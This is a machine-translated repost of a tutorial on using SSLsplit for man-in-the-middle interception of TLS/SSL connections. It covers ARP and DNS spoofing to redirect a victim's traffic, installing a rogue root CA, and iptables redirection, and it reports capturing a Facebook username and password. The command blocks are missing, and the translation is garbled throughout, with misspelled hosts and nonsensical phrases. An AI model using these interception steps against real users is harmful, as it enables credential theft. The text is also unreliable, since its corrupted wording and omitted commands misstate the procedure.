I recently demonstrated how to use mitmproxty to perform an intermediate person attack http (S) connection. When Mitmproxy work supports HTTP-based communication, it does not understand other TLS/SSL based traffic, such as FTPS, SMTP over SSL, IMAP over SSL, or some other protocol that overrides Tls/ssl.
Sslsplit is the general Tls/ssl agent for Man-in-the-middle attacks through all secure communication protocols. Using Sslsplit, you can intercept and store SSL-based traffic to listen to any secure connection.
1. Working principle
Sslsplit is very similar to other SSL proxy tools: it acts as an intermediary between the client and the server. As long as traffic is redirected to a server that Sslsplit runs (changing the default gateway, ARP spoofing, or other means), Sslsplit begins an SSL connection and pretends to be the server to which the client is connected. To do this, it dynamically claims a certificate that uses the CA certificate's private key (client-trusted) signature.
For example, if a customer wants to send an email using the Gmail SMTP server (the smtp.gmai.com port creates a certificate for 465,sslsplit and then pretends to be a Gmail mail server pointing to the client. In the upstream direction (pointing to the real Gmil server), Sslsplit connects to the client, much like the common client of the moth--forwarding all the actual client-written traffic.
If you are interested in details, check out how to work part of the blog about HTTP interception with Mitmproxy. The basic concept is the same, so it's easier to understand.
2. Installation and Operation Sslsplit
How to intercept SSL (and non-SSL) traffic.
2.1 Traffic Redirection
2.1.1 uses ARP spoofing to map the traffic to the victim from the MAC address of the standard gateway by publishing the IP address to the attacker. You don't need physical access to the victim. View the Arpspoof tool.
2.1.2 modifies the victim's default gateway.
The simplest way to 2.1.3 is to have access to the victim's device.
2.1.4 strengthens the DSN and DNS server entry that can back the attacker's IP address. See the tutorial on DNS spoofing.
2.1.5 redirects each domain by modifying the/etc/hosts file.
The simplest method mentioned above is to change the victim's default gateway address to the attacker's IP. Make sure the traffic passes through your machine. Since we need to install the CA certificate later, we need physical access to the victim's machine.
Download and compile Sslsplit
2.3 Create and install a root CA certificate
In order for Sslsopit to act as an intermediary, its victim must trust the root CA certificate that stores the attacker. Depending on the type of client (browser, phone), the root certificate is still somewhat different
Generate a CA private key and certificate:
2.4 Enabling IP Forwarding and NAT engine (iptables)
In this example, Sslsplit will run on two ports: 8080 for non-SSL TCP connections, such as HTTP,SMTP or tfp;8443 for SSL connections, such as Smtp,https over SSL. The futuristic loading method arrives at the attacker's machine's package to these internal ports, which the NAT engine can be used.
2.5 Running Sslsplit
Once the IP forwarding is very active and the packet is forwarded to the relevant port, you can start sslsplit. That sounds simple, and so is the truth. Because Sslsplit is a very powerful tool, it is very flexible. You can see more detailed sslsplit manuals for more information.
Reasonable configuration of parameters:
This command starts in debug mode Sslsplit (-D, run in foreground, background not, verbose output), Output City Connection in log file "Connections.log" (-l ...). The real connection content is written in "/tmp/sslsplit/logdir/" (-j ... And-S. Each connection in each individual file has an incoming/outgoing TCP stream.
Assuming your configuration is correct, you can now start browsing and sending/receiving e-mails. Sslsplit to output the connection details on the console:
Each file indicates that the TCP socket can be opened, showing the exact time, source and destination IP address and port. You can see in the file header:
You can use Sslsplit to listen to different protocols. Below are a few examples of HTTPS, SSL-based IMAP and SMTP via SSL.
3.1 Sniffing HTTPS (Google.de & facebook.com)
Once Sslsplit starts running, all communication between the client and the actual server passes through Sslsplit. Using the-D option, sslsplit prints out the connection and certificate forgery in stdout. In addition, the content is LogDir ("/tmp/sslsplit/logdir"). With Tail-f/tmp/sslsplit/loggdir/20130804t162301z-*.log, you can follow communication between the client and the server.
The output of the sslsplit is shown in the above. This indicates that the upstream Facebook certificate is true, with the Sslsplit forged certificate, two fingerprints different because it was signed by a different certification authority.
The lower console displays the contents of the HTTPS communication. This shows the HTTPS POST request "Https://www.facebook.com/login.php?login_attempt=1", including my user name (&email=) and password (&pass=).
If a person clicks on a small lock image on any SSL/TLS encrypted website while redirecting traffic through Sslsplit, the certificate is issued to the true CN, organization (O), and organizational unit (OU), but not by a real ca.
Other examples can be viewed http://blog.philippheckel.com/2013/08/04/use-sslsplit-to-transparently-sniff-tls-ssl-connections/
This article by 360 security broadcast translation, reprint please specify "Transfer from 360 security broadcast", and attached link.
Original link: http://blog.philippheckel.com/2013/08/04/use-sslsplit-to-transparently-sniff-tls-ssl-connections/
The above is the original
It's my test success picture.
Using Sslsplit sniffer Tls/ssl connection